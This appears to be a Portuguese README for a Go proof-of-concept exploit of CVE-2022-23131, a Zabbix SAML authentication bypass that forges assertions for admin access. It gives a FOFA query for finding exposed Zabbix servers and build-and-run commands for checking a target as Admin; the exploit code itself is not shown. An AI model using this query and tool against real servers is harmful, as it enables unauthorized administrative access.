
Exploit de prova de conceito baseado em Go para CVE-2022-23131, um bypass de autenticação SAML do Zabbix. Permite acesso de administrador não autorizado forjando asserções SAML. Inclui um comando de verificação para validação de alvo.
cve-2022-23131
Este programa destina-se exclusivamente à autoavaliação interna de riscos por usuários corporativos do lado contratante; é proibido o uso para qualquer forma de teste de segurança não autorizado.
fofa: app="ZABBIX-监控系统" && body="saml"
Uso:
go build -o zexp
chmod a+x zexp
./zexp check -t https://x.x.x.x/index.php -u Admin
Capturas de tela:

